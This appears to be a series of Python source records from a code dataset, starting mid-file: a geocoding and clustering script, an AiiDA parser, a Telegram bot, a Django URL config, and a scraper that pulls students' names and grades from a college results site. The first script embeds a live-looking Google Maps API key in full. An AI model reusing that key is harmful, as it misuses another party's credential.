'https://maps.googleapis.com/maps/api/geocode/json?key=AIzaSyBP5766yBfJirdZXwkm05u5_NcWFAoGa-k' \\\n '&sensor=false&language=ko&address={}'.format(addr)\n response = requests.get(URL)\n dj = response.json()\n lat = dj['results'][0]['geometry']['location']['lat']\n lng = dj['results'][0]['geometry']['location']['lng']\n locations_lat.append(lat)\n locations_lng.append(lng)\n\nser_lat = pd.Series(locations_lat)\nser_lng = pd.Series(locations_lng)\nframe = { 'lat': ser_lat, 'lng': ser_lng }\nresult = pd.DataFrame(frame)\n\nwcss = []\nfor i in range(1, 15):\n model = KMeans(n_clusters=i)\n model.fit(result[['lat', 'lng']])\n wcss.append(model.inertia_)\n\n#== USE DISPLAY ONLY ==\n#plt.figure(figsize=(12,6))\n#plt.plot(range(1, 15), wcss)\n#plt.title('The Elbow Method')\n#plt.xticks(range(1,15))\n#plt.xlabel('Clusters')\n#plt.ylabel('wcss')\n#plt.show()\n\nmodel = KMeans(n_clusters=12)\nmodel.fit(result[['lat', 'lng']])\nresult['Cluster'] = model.predict(result[['lat', 'lng']])\n\ndf12 = result[result.Cluster==0]\nprint(df12)\nprint(df12['lat'])\n\ndf12.groupby(['Cluster'], as_index=False).mean()\nclus_result = result.groupby(['Cluster'], as_index=False).mean()\nmean_result = clus_result.mean()\nmean_loc = [mean_result.lat,mean_result.lng]\n\nloc_result = clus_result[['lat','lng']]\n\nclus_list = loc_result.values.tolist()\n\n#== USE DISPLAY ONLY ==\n#map = folium.Map(location=mean_loc, zoom_start=8,tiles='Stamen Terrain')\n#for i in range(12):\n# folium.Marker(clus_list[i]).add_to(map)\n#map\n\n#temp_list = result.values.tolist()\n#map1 = folium.Map(location=mean_loc, zoom_start=8,tiles='Stamen Terrain')\n#for i in range(100):\n# folium.Marker(temp_list[i]).add_to(map1)\n#map1\n\n###===============================================\nimport json\nimport requests as r\n\nhttp_header = {\n 'user-agent': 'Mozilla/5.0 (iPhone; CPU iPhone OS 11_0 like Mac OS X) AppleWebKit/604.1.38 (KHTML, like Gecko) Version/11.0 Mobile/15A372 Safari/604.1',\n 'x-requested-with': 'XMLHttpRequest'\n}\nsession = 
r.Session()\nsession.headers.update(http_header)\nsearch_distance_url_base = 'https://m.map.naver.com/spirra/findCarRoute.nhn?route=route3&output=json&result=web3&coord_type=latlng&search=2&car=0&mileage=12.4'\n\ndef SEARCH_DISTANCE_URL(start_point, end_point):\n return search_distance_url_base+'&start={}&destination={}'.format(start_point, end_point)\ndef SEARCH_POINT_URL(q):\n return 'https://m.map.naver.com/apis/search/poi?query={}&page=1'.format(q)\ndef GET_END_POINT(loc_list):\n x = loc_list[0]\n y = loc_list[1]\n return '{},{},1'.format(y, x)\ndef GET_INFO(start, end):\n res = session.get(SEARCH_DISTANCE_URL(GET_END_POINT(start),GET_END_POINT(end))).text\n res_dict = json.loads(res)\n target = res_dict['routes'][0]['summary']\n sec = target['duration']\n return sec\n\ndef relational_time_matrix(clusted_list):\n last_matrix = []\n for i in range(len(clus_list)):\n temp = []\n for j in range(len(clus_list)):\n if i is j:\n temp.append(0)\n elif(i > j):\n temp.append(last_matrix[j][i])\n else:\n temp.append(GET_INFO(clusted_list[i], clusted_list[j]))\n last_matrix.append(temp)\n return last_matrix\n\ntime_mat = relational_time_matrix(clus_list)\n\nnp_time = np.array(time_mat)\n\ndown_arr = np.asarray(np_time)\nnp.savetxt(\"time_relation.csv\", down_arr, fmt='%4d', delimiter=\",\")", "repo_name": "HEUMMAN/generateOptimalRoot", "sub_path": "timeRelationMatrix.py", "file_name": "timeRelationMatrix.py", "file_ext": "py", "file_size_in_byte": 3716, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pandas.read_excel", "line_number": 9, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 19, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 26, "usage_type": "call"}, {"api_name": "pandas.Series", "line_number": 27, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 46, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 83, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 121, "usage_type": "call"}]} +{"seq_id": "25064294414", "text": "# -*- coding: utf-8 -*-\n\"\"\"Parser implementation for the `CifCodNumbersCalculation` plugin.\"\"\"\nimport re\nimport traceback\n\nfrom aiida_codtools.calculations.cif_cod_numbers import CifCodNumbersCalculation\nfrom aiida_codtools.parsers.cif_base import CifBaseParser\n\n\nclass CifCodNumbersParser(CifBaseParser):\n \"\"\"Parser implementation for the `CifCodNumbersCalculation` plugin.\"\"\"\n\n # pylint: disable=inconsistent-return-statements\n\n _supported_calculation_class = CifCodNumbersCalculation\n\n def parse_stdout(self, filelike):\n \"\"\"Parse the content written by the script to standard out.\n\n :param filelike: filelike object of stdout\n :returns: an exit code in case of an error, None otherwise\n \"\"\"\n from aiida.orm import Dict\n\n numbers = {}\n content = filelike.read().strip()\n\n if not content:\n return self.exit_codes.ERROR_EMPTY_OUTPUT_FILE\n\n # The filelike should be in binary mode, so we should decode the bytes, assuming the content is in `utf-8`\n content = content.decode('utf-8')\n\n 
try:\n for line in content.split('\\n'):\n formula, identifier, count, _ = re.split(r'\\s+', line.strip())\n numbers[identifier] = {'count': int(count), 'formula': formula}\n except Exception: # pylint: disable=broad-except\n self.logger.exception('Failed to parse the numbers from the stdout file\\n%s', traceback.format_exc())\n return self.exit_codes.ERROR_PARSING_OUTPUT_DATA\n\n self.out('numbers', Dict(dict=numbers))\n\n return\n", "repo_name": "aiidateam/aiida-codtools", "sub_path": "src/aiida_codtools/parsers/cif_cod_numbers.py", "file_name": "cif_cod_numbers.py", "file_ext": "py", "file_size_in_byte": 1591, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "aiida_codtools.parsers.cif_base.CifBaseParser", "line_number": 10, "usage_type": "name"}, {"api_name": "aiida_codtools.calculations.cif_cod_numbers.CifCodNumbersCalculation", "line_number": 15, "usage_type": "name"}, {"api_name": "re.split", "line_number": 36, "usage_type": "call"}, {"api_name": "traceback.format_exc", "line_number": 39, "usage_type": "call"}, {"api_name": "aiida.orm.Dict", "line_number": 42, "usage_type": "call"}]} +{"seq_id": "8715109318", "text": "import os\nimport logging\nimport bot_config\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram.types import ReplyKeyboardMarkup, KeyboardButton\nfrom aiogram import executor\nfrom django.core.files import File\nfrom works.models import Project\n\n\nlogging.basicConfig(level=logging.INFO)\nbot = Bot(token=bot_config.TOKEN)\nstorage = MemoryStorage()\ndp = Dispatcher(bot, storage=MemoryStorage())\n\n# pro = Project.objects.create(title='gera', description='hello world', image='media/projects/file_11.jpg', link='www.inst.com')\n# print(pro.description)\n\nproject_instance = Project()\n\n\nclass Project(StatesGroup):\n add_project = State()\n title = State()\n description = State()\n image = State()\n link = State()\n\n\n@dp.message_handler(commands=['start'])\nasync def cmd_start(message: types.Message):\n await message.answer(\n 'Привет! 
Хотите добавить проект?',\n reply_markup=ReplyKeyboardMarkup(\n resize_keyboard=True,\n keyboard=[\n [\n KeyboardButton(text=\"Да\"),\n KeyboardButton(text=\"Нет\"),\n ],\n ],\n )\n )\n await Project.add_project.set()\n\n\n@dp.message_handler(state=Project.add_project)\n@dp.message_handler(lambda message: message.text == 'Да')\nasync def add_project(message: types.Message, state: FSMContext):\n await message.answer('Введите название проекта:')\n project_instance.title = message.text\n await Project.title.set()\n\n\n@dp.message_handler(state=Project.title)\nasync def process_title(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['title'] = message.text\n await message.answer('Введите описание проекта:')\n project_instance.description = message.text\n await Project.description.set()\n\n\n@dp.message_handler(state=Project.description)\nasync def process_description(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['description'] = message.text\n await message.answer('Пришлите фотографию проекта:')\n project_instance.image = message.text\n await Project.image.set()\n\n@dp.message_handler(content_types=['photo'], state=Project.image)\nasync def process_photo(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n photo = message.photo[-1]\n photo_path = f\"media/projects/{data['title']}.jpg\"\n upload_dir = os.path.dirname(photo_path)\n if not os.path.exists(upload_dir):\n os.makedirs(upload_dir)\n await photo.download(destination_file=photo_path)\n data['image'] = photo_path\n await state.update_data(data) \n project_instance = Project() \n project_instance.image = photo_path\n await message.answer('Введите ссылку на проект:')\n await state.update_data(project_instance=project_instance) \n await Project.link.set()\n\n\n\n\n@dp.message_handler(state=Project.link)\nasync def process_link(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n project_instance = data['project_instance']\n data['link'] = message.text\n project_instance.link = message.text\n await state.finish()\n await message.answer('Проект сохранен!')\n\n\nif __name__ == '__main__':\n executor.start_polling(dp, skip_updates=True)", "repo_name": "iimgera/telebot", "sub_path": "bot.py", "file_name": "bot.py", "file_ext": "py", "file_size_in_byte": 3612, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.basicConfig", "line_number": 14, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 14, "usage_type": "attribute"}, {"api_name": "aiogram.Bot", "line_number": 15, "usage_type": "call"}, {"api_name": "bot_config.TOKEN", "line_number": 15, "usage_type": "attribute"}, {"api_name": "aiogram.contrib.fsm_storage.memory.MemoryStorage", "line_number": 16, "usage_type": "call"}, {"api_name": "aiogram.Dispatcher", "line_number": 17, "usage_type": "call"}, {"api_name": "aiogram.contrib.fsm_storage.memory.MemoryStorage", "line_number": 17, "usage_type": "call"}, {"api_name": "works.models.Project", "line_number": 22, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.StatesGroup", "line_number": 25, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 26, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 27, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 28, 
"usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 29, "usage_type": "call"}, {"api_name": "aiogram.dispatcher.filters.state.State", "line_number": 30, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 34, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 34, "usage_type": "name"}, {"api_name": "aiogram.types.ReplyKeyboardMarkup", "line_number": 37, "usage_type": "call"}, {"api_name": "aiogram.types.KeyboardButton", "line_number": 41, "usage_type": "call"}, {"api_name": "aiogram.types.KeyboardButton", "line_number": 42, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 52, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 52, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 52, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 59, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 59, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 59, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 68, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 68, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 68, "usage_type": "name"}, {"api_name": "aiogram.types.Message", "line_number": 76, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 76, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 76, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 82, "usage_type": "call"}, {"api_name": "aiogram.types.Message", "line_number": 96, "usage_type": "attribute"}, {"api_name": "aiogram.types", "line_number": 96, "usage_type": "name"}, {"api_name": "aiogram.dispatcher.FSMContext", "line_number": 96, "usage_type": "name"}, {"api_name": "aiogram.executor.start_polling", "line_number": 106, "usage_type": "call"}, {"api_name": "aiogram.executor", "line_number": 106, "usage_type": "name"}]} +{"seq_id": "6323696696", "text": "import numpy as np\n\nfrom nomad.metainfo import (\n Quantity,\n Section,\n SubSection)\n# from nomad.datamodel.data import ArchiveSection\n\nfrom .. 
import BaseMeasurement, LibraryMeasurement\n\n\nclass Ellipsometry(BaseMeasurement):\n '''Ellipsometry'''\n\n m_def = Section(\n a_eln=dict(hide=['certified_values', 'certification_institute']))\n\n data_file = Quantity(\n type=str,\n shape=['*'],\n a_eln=dict(component='FileEditQuantity'),\n a_browser=dict(adaptor='RawFileAdaptor'))\n\n def normalize(self, archive, logger):\n self.method = \"Ellipsometry\"\n super(Ellipsometry, self).normalize(archive, logger)\n\n\nclass EllipsometryLibrary(LibraryMeasurement):\n '''Ellipsometry Measurement'''\n\n m_def = Section(\n a_eln=dict(hide=['certified_values', 'certification_institute']))\n\n def normalize(self, archive, logger):\n super(EllipsometryLibrary, self).normalize(archive, logger)\n self.method = \"Ellipsometry\"\n", "repo_name": "RoteKekse/nomad-baseclasses", "sub_path": "baseclasses/characterizations/ellipsometry.py", "file_name": "ellipsometry.py", "file_ext": "py", "file_size_in_byte": 987, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "nomad.metainfo.Section", "line_number": 15, "usage_type": "call"}, {"api_name": "nomad.metainfo.Quantity", "line_number": 18, "usage_type": "call"}, {"api_name": "nomad.metainfo.Section", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "33823528970", "text": "import urllib2\nimport urllib\nimport re\nimport os\nimport sys\nfrom bs4 import BeautifulSoup\n\ndef getInfo(filename, cnt):\n\tfp = open(filename, 'r')\n\t#title = fp.readline()\n\thtml = fp.read()\n\tfp.close()\n\toutfile = \"src/result/\" + str(cnt) + \".txt\"\n\tfw = open(outfile, 'w')\n\tinfo = BeautifulSoup(html, \"lxml\")\n\ttrList = info.find_all(\"tr\")\n\tcnt = 0\n\t#fw.write(title)\n\tfor tr in trList:\n\t\tfout = ''\n\t\tcnt = cnt + 1\n\t\tcontent = False\n\t\thead = 0\n\t\tif (cnt > 1):\n\t\t\ttag = \"\"\n\t\t\tfor string in tr.stripped_strings:\n\t\t\t\tif head == 0:\n\t\t\t\t\ttag = string.encode('utf-8')\n\t\t\t\t\tfout = fout + string.encode('utf-8') + \":\"\n\t\t\t\telse:\n\t\t\t\t\ttemp = string.strip()\n\t\t\t\t\tstart = temp.find(\"(\")\n\t\t\t\t\tif start != -1:\n\t\t\t\t\t\ttemp = temp[:start] + temp[start + 1 : ]\n\t\t\t\t\tend = temp.find(\")\")\n\t\t\t\t\tif end == len(temp) - 1:\n\t\t\t\t\t\ttemp = temp[: -1]\n\t\t\t\t\tstart = temp.find(\",\")\n\t\t\t\t\tif start == 0:\n\t\t\t\t\t\ttemp = temp[1:]\n\t\t\t\t\tend = temp.find(\",\")\n\t\t\t\t\tif end == len(temp) - 1:\n\t\t\t\t\t\ttemp = temp[: -1]\n\t\t\t\t\tif temp == \"[1]\" or temp == \"[2]\" or temp == \"[3]\" or temp == \"[4]\" or temp == \"[5]\" or temp == \"[6]\" or temp == \"[7]\" or temp == \"[8]\" or temp == \"[9]\":\n\t\t\t\t\t\ttemp = \"\"\n\t\t\t\t\tif temp == \"\":\n\t\t\t\t\t\thead = head + 1\n\t\t\t\t\t\tcontinue\n\t\t\t\t\tif (tag == \"Born\") and (head == 1):\n\t\t\t\t\t\tif not temp[0].isdigit():\n\t\t\t\t\t\t\thead = head + 1\n\t\t\t\t\t\t\tcontinue\n\t\t\t\t\tif temp !=\"\":\n\t\t\t\t\t\tfout = fout + temp.encode('utf-8') + \";\"\n\t\t\t\t\t\tcontent = True\n\t\t\t\thead = head + 1\n\t\telse:\n\t\t\tlabel = True\n\t\t\tfor title in tr.stripped_strings:\n\t\t\t\tif label:\n\t\t\t\t\tfw.write(title.encode('utf-8') + \"\\n\")\n\t\t\t\t\tlabel = False\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\tif content:\n\t\t\tfw.write(fout + \"|\\n\")\n\tfw.close()\n\ndef main():\n\tfor i in range(1, 10001):\n\t\tfilename = \"src/doc/\" + str(i) + \".html\"\n\t\tgetInfo(filename, i)\n\nif __name__ == \"__main__\":\n\tmain()", "repo_name": "Bran-Sun/search-engine", "sub_path": 
"listFile.py", "file_name": "listFile.py", "file_ext": "py", "file_size_in_byte": 1770, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "bs4.BeautifulSoup", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "29801336061", "text": "from bs4 import BeautifulSoup\nimport requests\nimport urllib.parse as u\nimport pandas as pd\n\nn = int(input('Enter Number of Students: '))\nURL = 'http://gct.ac.in/result'\ns = requests.Session()\n\ndef fetch(url, data=None):\n if data is None:\n return s.get(url).content\n else:\n return s.post(url, data=data).content\n\nsoup = BeautifulSoup(fetch(URL),'lxml')\nform = soup.findAll('form')\n\nfields = form[1].findAll('input')\n\nformdata = dict( (field.get('name'), field.get('value')) for field in fields)\n\nsheet = pd.read_csv('/Users/amrs/Desktop/sampel.csv') #The input CSV file location to read Register Numbers\nreg_arr = []\nfor i in sheet['Register No']:\n reg_arr.append(str(i))\n\nprint('\\nRegister Numbers submitted. Wait for a while...\\n')\nprint('--------------------------------------------------------------------------------\\n')\n\ndf = pd.DataFrame()\n\nfor regno in reg_arr: \n formdata['reg_no'] = regno #register numbers\n formdata['btn'] = 'Submit'\n\n posturl = u.urljoin(URL, form[1]['action'])\n\n r = s.post(posturl, data=formdata)\n\n tempSoup = BeautifulSoup(r.text,'lxml')\n\n tablediv = tempSoup.find('div', {'class':'result_tbl'})\n\n tablesoup = BeautifulSoup(str(tablediv),'lxml')\n table = tablesoup.findAll('table')[1:]\n\n colnames = []\n coldata = []\n\n for rows in table[1].findAll('tr')[1:]:\n cols = rows.findAll('td')\n for c in cols:\n tempdata = c.find('div')\n coldata.append(tempdata.find(text=True))\n\n subcode = ['Registration Number','Name']\n for a in range(0,len(coldata),5):\n subcode.append(coldata[a])\n temp = []\n\n for rows in table[2].findAll('tr'):\n cols = rows.findAll('td')\n for c in cols:\n temp.append(c.find(text=True))\n subcode.append(temp[0])\n \n for rows in table[0].findAll('tr'):\n cols = rows.findAll('td')\n for c in cols:\n colnames.append(c.find(text=True))\n\n #print('-------------------------------------------------------------------------------')\n reg_name_gradepts = []\n reg_name_gradepts.append(colnames[1])\n reg_name_gradepts.append(colnames[3])\n for a in range(3,len(coldata),5):\n reg_name_gradepts.append(coldata[a])\n\n #print('-------------------------------------------------------------------------------')\n reg_name_gradepts.append(temp[1])\n\n df2 = pd.DataFrame([reg_name_gradepts],columns=subcode)\n df = df.append(df2,ignore_index=True)\n\ntemplist = list(df.columns.values)\ncolorder = [templist[-1]]+[templist[-2]]+templist[:-2]\n\ndf = df[colorder]\ndf.to_csv('/Users/amrs/Desktop/out.csv') #The output CSV file location where the Results of Students are stored\nprint('Successfully created Sheet!\\n')\n", "repo_name": "amrs-tech/Exam-Result-Extractor", "sub_path": "form_submit.py", "file_name": "form_submit.py", "file_ext": "py", "file_size_in_byte": 2748, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "requests.Session", "line_number": 8, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 23, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 31, "usage_type": "call"}, {"api_name": "urllib.parse.urljoin", 
"line_number": 37, "usage_type": "call"}, {"api_name": "urllib.parse", "line_number": 37, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 41, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 45, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 83, "usage_type": "call"}]} +{"seq_id": "16936185162", "text": "\"\"\"Drosometer URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/4.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\n\nfrom django.urls import path, include\nfrom Droso import views\nfrom django.conf import settings\nfrom Droso.views import loginUser\nfrom django.conf.urls.static import static\n\nfrom django.contrib.auth.views import PasswordResetView, PasswordResetDoneView, PasswordResetConfirmView, \\\n PasswordResetCompleteView\n\nfrom django.contrib.auth import views as auth_views\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n path('', views.main),\n\n # Login Paths\n path('login', loginUser),\n path('logout', views.logoutUser),\n path('register', views.register_page),\n\n # Wing Paths\n path('w_dimen', views.wingdimen),\n path('bar', views.w_bar),\n path('w_dimen2', views.wingdimen2),\n path('details', views.detail_dimen),\n\n path('w_shape', views.wingshape),\n path('w_shape2', views.wingshape2),\n path('w_shape_fb', views.shape_output),\n path('out', views.shape_output),\n\n path('w_bristles', views.wingbristles),\n path('w_bristles2', views.wingbristles2),\n path('cropper_wing', views.cropper_bristles),\n\n path('f_eye', views.eye_f),\n path('f_wing', views.wing_f),\n\n # Other paths\n path('aboutus', views.myteam),\n path('contactus', views.c_us),\n path('feedback', views.f_b),\n # path('wing', views.wingfront),\n # path('eye', views.eyefront),\n\n # Eye Paths\n path('e_omat', views.eye_omat),\n path('e_omat2', views.eye_omat2),\n path('cropper_eye', views.cropper_eye),\n\n path('eye_col', views.eye_col),\n path('col2', views.eye_col2),\n path('e_c_o', views.eye_col_output),\n\n path('e_dimen', views.eyedimen),\n path('e_dimen2', views.eyedimen2),\n path('e_d_o', views.e_dimen_out),\n\n # Dashboard Paths\n path('w_dashboard', views.wing_dashboard),\n path('e_dashboard', views.eye_dashboard),\n\n # RingAssay Paths\n path('ring_assay', views.ring_assay_1),\n path('ring_assay2', views.ring_assay_2),\n path('ring_out', views.ring_out),\n\n # path('f_thorax', views.thorax_f),\n\n # path('check', views.fetch_data),\n\n # path('password_reset/', auth_views.PasswordResetView.as_view(\n # template_name='templates/user/password_reset.html'), name='password_reset'),\n # path('password_reset/done/', auth_views.PasswordResetDoneView.as_view(\n # template_name='templates/user/password_reset_done.html'), name='password_reset_done'),\n # path('reset///', auth_views.PasswordResetConfirmView.as_view(\n # template_name='templates/user/password_reset_confirm.html'), name='password_reset_confirm'),\n # path('reset/done/', auth_views.PasswordResetCompleteView.as_view(\n # 
template_name='templates/user/password_reset_complete.html'), name='password_reset_complete'),\n\n path('generate-pdf/', views.generate_pdf_view, name='generate_pdf'),\n path('data', views.dowdata),\n ] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n", "repo_name": "buttawb/Makkhimeter-FYP", "sub_path": "Drosometer/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 4431, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 30, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "Droso.views.main", "line_number": 31, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 31, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "Droso.views.loginUser", "line_number": 34, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "Droso.views.logoutUser", "line_number": 35, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 35, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "Droso.views.register_page", "line_number": 36, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 36, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "Droso.views.wingdimen", "line_number": 39, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 39, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "Droso.views.w_bar", "line_number": 40, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 40, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "Droso.views.wingdimen2", "line_number": 41, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 41, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "Droso.views.detail_dimen", "line_number": 42, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 42, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "Droso.views.wingshape", "line_number": 44, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 44, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "Droso.views.wingshape2", "line_number": 45, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 45, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "Droso.views.shape_output", "line_number": 46, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 46, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "Droso.views.shape_output", "line_number": 47, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 47, 
"usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "Droso.views.wingbristles", "line_number": 49, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 49, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "Droso.views.wingbristles2", "line_number": 50, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 50, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "Droso.views.cropper_bristles", "line_number": 51, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 51, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "Droso.views.eye_f", "line_number": 53, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 53, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "Droso.views.wing_f", "line_number": 54, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 54, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 57, "usage_type": "call"}, {"api_name": "Droso.views.myteam", "line_number": 57, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 57, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 58, "usage_type": "call"}, {"api_name": "Droso.views.c_us", "line_number": 58, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 58, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 59, "usage_type": "call"}, {"api_name": "Droso.views.f_b", "line_number": 59, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 59, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 64, "usage_type": "call"}, {"api_name": "Droso.views.eye_omat", "line_number": 64, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 64, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 65, "usage_type": "call"}, {"api_name": "Droso.views.eye_omat2", "line_number": 65, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 65, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 66, "usage_type": "call"}, {"api_name": "Droso.views.cropper_eye", "line_number": 66, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 66, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 68, "usage_type": "call"}, {"api_name": "Droso.views.eye_col", "line_number": 68, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 68, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 69, "usage_type": "call"}, {"api_name": "Droso.views.eye_col2", "line_number": 69, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 69, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 70, "usage_type": "call"}, {"api_name": "Droso.views.eye_col_output", "line_number": 70, "usage_type": "attribute"}, {"api_name": "Droso.views", "line_number": 70, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 72, "usage_type": "call"}, {"api_name": 